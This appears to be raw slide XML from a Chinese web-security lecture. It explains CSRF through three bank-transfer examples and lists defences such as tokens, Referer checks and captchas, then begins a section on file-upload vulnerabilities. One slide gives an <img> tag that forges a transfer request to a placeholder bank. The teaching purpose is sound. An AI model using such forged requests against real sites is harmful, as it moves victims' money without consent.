            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>冒用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>”。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>➢跨站请求可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>各种方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>：图片URL、超链接、CORS、Form提交等等。部分请求方式可以直接嵌入在第三方论坛、文章中，难以进行追踪。</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49872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 攻击特点</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3977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CSRF攻击案例</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042285" y="781685"/>
            <a:ext cx="8533765" cy="6042660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10172700" y="6294755"/>
            <a:ext cx="1403350" cy="373380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358140" y="781685"/>
            <a:ext cx="2540000" cy="5631180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t> 当我们</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>登入转账页面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>后，突然眼前一亮惊现"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXX隐私照片，不看后悔一辈子"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>的链接，耐不住内心躁动，立马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>点击了该危险的网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，但当这页面一加载，便会执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>submitForm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>这个方法来提交转账请求，从而将10块转给黑客。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3564255" y="3666490"/>
            <a:ext cx="7509510" cy="1492250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">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02300" y="4338955"/>
            <a:ext cx="787400" cy="708660"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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animBg="1"/>
      <p:bldP spid="1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3977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CSRF攻击案例</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1798955" y="1399540"/>
            <a:ext cx="10264775" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>示例1：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>银行网站A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>，它以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>来完成银行转账的操作，如：http://www.mybank.com/Transfer.php?toBankId=11&amp;money=1000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>危险网站B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>，它里面有一段HTML的代码如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>&lt;img src=http://www.mybank.com/Transfer.php?toBankId=11&amp;money=1000&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>首先，你登录了银行网站A，然后访问危险网站B，这时你会发现你的银行账户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>少了1000块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>......</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1798955" y="3627755"/>
            <a:ext cx="10006330" cy="4933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0000"/>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0414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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1793824" y="782249"/>
            <a:ext cx="10264775" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>示例２：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>银行网站A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>，为了杜绝上面的问题，决定改用POST请求完成转账操作：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>危险网站B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>，仍然只是包含那句HTML代码：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>&lt;img src=http://www.mybank.com/Transfer.php?toBankId=11&amp;money=1000&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>和示例1中的操作一样，你首先登录了银行网站A，然后访问危险网站B，结果.....和示例1一样，你</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>再次没了1000块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>这次事故的原因是：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>银行后台使用了$_REQUEST去获取请求的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>，而$_REQUEST既可以获取GET请求的数据，也可以获取POST请求的数据，这就造成了在后台处理程序无法区分这到底是GET请求的数据还是POST请求的数据。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1798955" y="3770630"/>
            <a:ext cx="10006330" cy="4933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0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927656" y="1752283"/>
            <a:ext cx="4133850" cy="1047750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6657340" y="1632903"/>
            <a:ext cx="3893185" cy="128651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0414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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1798955" y="781685"/>
            <a:ext cx="4963160" cy="4523105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>示例３：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>银行网站A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，经过前面2个惨痛的教训，银行决定把获取请求数据的方法也改了，改用$_POST，只获取POST请求的数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>危险网站B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，危险网站B与时俱进，它改了一下代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>　</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6762115" y="3126740"/>
            <a:ext cx="4264660" cy="1800225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6762115" y="1235075"/>
            <a:ext cx="5234305" cy="1748790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="4926965"/>
            <a:ext cx="9405620" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>如果用户仍是继续上面的操作，很不幸，结果将会是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>再次不见1000块.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>.....因为这里危险网站B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>暗地里发送了POST请求到银行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>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05867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CSRF的防御</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751965" y="876300"/>
            <a:ext cx="10201910" cy="5631180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.检验HTTP Referer来源</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTTP 头部字段 Referer记录了该 HTTP 请求的来源是同域下还是跨站发起的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.在请求地址中添加 token 并验证</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>在 HTTP 请求中以参数的形式加入一个随机产生的 token（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不能伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>），并在服务器端建立一个拦截器来验证这个 token，如果请求中没有 token 或者 token 内容不正确，则认为可能是 CSRF 攻击而拒绝该请求。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.在 HTTP 头中自定义属性并验证</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>通过 XMLHttpRequest 这个类，可以一次性给所有该类请求加上 csrftoken 这个 HTTP 头属性，并把 token 值放入HTTP头部。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4.设置验证码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>在发送请求前先需要输入基于服务端判断的验证码，强制用户必须与应用进行交互，才能完成最终请求。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.尽量使用POST接口，限制GET接口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET接口太容易被拿来做CSRF攻击，只要构造一个链接，便可以进行CSRF攻击。接口最好限制为POST使用，降低攻击风险。</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79270" y="2549525"/>
            <a:ext cx="10457815" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1"/>
              <a:t>文件上传漏洞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文件上传漏洞内涵</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2442210" y="1018540"/>
            <a:ext cx="5759450" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应用程序通常会有</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文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的功能。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8198" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3572193" y="1495108"/>
            <a:ext cx="4689475" cy="2366962"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="3862070"/>
            <a:ext cx="9929495" cy="2861310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="469900" indent="-469900" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件上传漏洞是指用户上传了一个可执行的脚本文件，并通过此脚本文件获得了执行服务器端命令的能力。“文件上传”本身是没有问题，有问题的是文件上传后，服务器怎么处理，解释文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
